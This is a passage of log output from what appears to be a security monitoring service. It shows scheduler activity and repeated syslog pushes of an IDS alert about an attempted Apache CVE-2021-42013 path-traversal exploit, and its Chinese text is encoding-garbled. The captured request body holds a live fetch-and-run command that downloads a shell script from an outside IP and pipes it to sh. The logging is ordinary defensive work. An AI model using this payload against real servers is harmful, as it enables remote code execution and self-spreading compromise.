MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:31:00' AND log_time < '2026-05-19 12:41:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:41:21.726 [scheduling-2] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:41:22.033 [scheduling-2] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 12:51:00
2026-05-19 12:41:22.033 [scheduling-2] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 12:41:39.060 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:41:39.061 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 12:41:39.062 [http-nio-8089-exec-3] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 12:41:39.062 [http-nio-8089-exec-3] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 12:42:00.027 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:42:00.027 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:42:00.260 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:42:00.260 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:42:00.939 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:42:00.940 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:42:53.686 [http-nio-8089-exec-1] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:42:53.686 [http-nio-8089-exec-1] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 12:42:53.687 [http-nio-8089-exec-1] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 12:42:53.687 [http-nio-8089-exec-1] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 12:43:00.016 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:43:00.016 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:43:00.246 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:43:00.246 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:43:00.516 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:43:00.516 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:44:00.014 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:44:00.014 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:44:00.239 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:44:00.241 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:44:00.499 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:44:00.499 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:45:00.003 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:45:00.003 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:45:00.082 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:45:00.227 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:45:00.229 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:45:00.256 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ174ms
2026-05-19 12:45:00.258 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:45:00.258
2026-05-19 12:45:00.261 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:45:00.261
2026-05-19 12:45:00.496 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:45:00.705 [scheduling-3] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:45:00.705 [scheduling-3] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 447ms
2026-05-19 12:45:00.854 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.010 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:46:00.010
2026-05-19 12:46:00.010 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:46:00.010 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:46:00.235 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:46:00.236 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:46:00.472 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.473 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:46:00.684 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 12:46:00.837 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 12:46:00.837 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 12:46:00.838 [scheduling-3] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ828ms
2026-05-19 12:47:00.001 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:47:00.002 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:47:00.150 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:47:00.224 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:47:00.402 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:47:00.434 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:47:05.252 [http-nio-8089-exec-6] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:47:05.253 [http-nio-8089-exec-6] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 12:47:05.254 [http-nio-8089-exec-6] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 12:47:05.254 [http-nio-8089-exec-6] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 12:48:00.018 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:48:00.253 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:48:00.253 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:48:00.490 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:48:00.609 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:48:00.837 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:49:00.005 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:49:00.005 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:49:00.240 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:49:00.240 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:49:00.576 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:49:00.576 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:40:16.894
2026-05-19 12:49:20.178 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - յsyslog: SyslogRequest{ip='192.168.0.124', port=514, logContent='<128>May 02 20:05:46 2026 {"sendHostAddress":"192.168.101.251", "deviceAssetSubTypeId":"59", "machineCode":"000d484ba79b", "interfaceName":"eth2", "transProtocol":"TCP", "appProtocol":"http", "logSessionId":"2605022005460345601", "srcAddress":"192.168.101.1", "srcPort":"41614", "srcMacAddress":"90-F1-B0-FA-CD-2A", "destMacAddress":"FA-16-C0-A8-65-AD", "destAddress":"192.168.101.173", "destPort":"80", "vlanId":"0", "vxlanId":"0", "productVendorName":"", "deviceAddress":"192.168.101.251", "eventCount":"1", "deviceSendProductName":"APTսԤ", "deviceProductType":"ּϵͳ", "deviceName":"devicename", "deviceId":"0", "deviceVersion":"2.0.79.89080.260305_ruletag_2.0.31216.260424.1", "srcGeoCountry":"й", "srcGeoRegion":"", "srcGeoCity":"", "srcGeoLongitude":"114.156924", "srcGeoLatitude":"22.340151", "destGeoCountry":"й", "destGeoRegion":"", "destGeoCity":"", "destGeoLongitude":"114.156924", "destGeoLatitude":"22.340151", "direction":"11", "attackerAddress":"srcAddress", "victimAddress":"destAddress", "attackDirection":"1", "attacker":["192.168.101.1"], "victim":["192.168.101.173"], "srcSecurityZone":"outer", "destSecurityZone":"outer", "logType":"alert", "dataType":"ids", "dataSubType":"attackAlert", "deviceCat":"/IDS/Network", "catObject":"/Host/Application/Service", "catBehavior":"/Access", "catOutcome":"FAIL", "catTechnique":"/Exploit/DirectoryTraversal", "severity":"5", "catSignificance":"/Informational/Warning", "eventId":"2605022005460000360199631657902", "startTime":"2026-05-02 20:05:46", "endTime":"2026-05-02 20:05:46", "deviceReceiptTime":"2026-05-02 20:05:46", "collectorReceiptTime":"2026-05-02 20:05:46", "ruleId":"93008265", "ruleName":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "alarmType":"WEB->·", "ruleType":"/WebAttack/DirTraversal", "requestMethod":"POST", "requestUrlQuery":"/cgi-bin/../../../../../../../bin/sh", "requestUrl":"/cgi-bin/../../../../../../../bin/sh", "requestHeader":"POST /cgi-bin/../../../../../../../bin/sh HTTP/1.1<br/>Host: 43.255.55.45:80<br/>Upgrade-Insecure-Requests: 1<br/>Accept: */*<br/>User-Agent: libredtail-http<br/>Connection: keep-alive<br/>Content-Type: text/plain<br/>Content-Length: 123<br/>", "requestBody":"(wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s apache.selfrep", "responseHeader":"HTTP/1.1 400 Bad Request<br/>Content-Type: text/html; charset=us-ascii<br/>Server: Microsoft-HTTPAPI/2.0<br/>Date: Sat, 02 May 2026 12:05:45 GMT<br/>Connection: close<br/>Content-Length: 324<br/>", "responseMsg":"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"><br/><HTML><HEAD><TITLE>Bad Request</TITLE><br/><META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD><br/><BODY><h2>Bad Request - Invalid URL</h2><br/><hr><p>HTTP Error 400. The request URL is invalid.</p><br/></BODY></HTML><br/>", "responseCode":"400", "destHostName":"43.255.55.45:80", "name":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013)", "cve":"CVE-2021-42013", "txId":"0", "confidence":"High", "httpVersion":"HTTP/1.1", "accessAgent":"libredtail-http", "attackStage":"1", "attackStatus":"3", "pcapRecord":"true", "tacticId":"TA0001", "techniquesId":"T1190", "isAPT":"false", "killChain":"KC_Exploitation", "message":"Apache HTTP Server 2.4.49 ·Խ© (CVE-2021-42013). Դ192.168.101.1/41614, Ŀģ192.168.101.173/80"}', protocol='TCP', facility='USER', severity='INFO'}
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - ʼsyslogϢ: IP=192.168.0.124, Port=514
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.common.service.SyslogService - TCP SyslogϢͳɹ: 192.168.0.124:514
2026-05-19 12:49:20.179 [http-nio-8089-exec-4] INFO com.controllers.SyslogPushController - SyslogϢͳɹ: IP=192.168.0.124, Port=514
2026-05-19 12:50:00.014 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:50:00.014 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 12:50:00.014 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:50:00.087 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 12:50:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ1ʱ152ms
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T12:50:00.239
2026-05-19 12:50:00.239 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T12:50:00.239
2026-05-19 12:50:00.241 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:50:00.242 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 228ms
2026-05-19 12:50:00.392 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 12:50:00.394 [scheduling-7] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 12:50:00.498 [scheduling-10] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T12:40:16.894 2026-05-19T12:50:00.238
2026-05-19 12:50:00.498 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 12:50:00.625 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 12:50:00.625 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 386ms
2026-05-19 12:50:00.721 [scheduling-10] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 12:50:00.721 [scheduling-10] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T12:50:00.238 ʼ
2026-05-19 12:50:00.863 [log-processor-9] INFO c.c.service.AccessLogAlertService - ȡ 1 µ־ݣʱ䷶Χ: 2026-05-19T12:50:00.238 2026-05-19T12:50:00.241
2026-05-19 12:50:00.863 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼ㷨: 㷨3 (ID: 2004083121877696514)
2026-05-19 12:50:00.910 [log-processor-9] INFO c.c.service.AccessLogAlertService - 㷨3 δ
2026-05-19 12:50:00.910 [log-processor-9] INFO c.c.service.AccessLogAlertService - ־ɣ´ν 2026-05-19T12:50:00.241 ʼ
2026-05-19 12:51:00.011 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:51:00.011 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T12:51:00.011
2026-05-19 12:51:00.011 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 12:51:00.232 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:51:00.234 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 1 м¼
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 12:51:00.542 [scheduling-10] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ1
2026-05-19 12:51:00.558 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T12:50:00.241
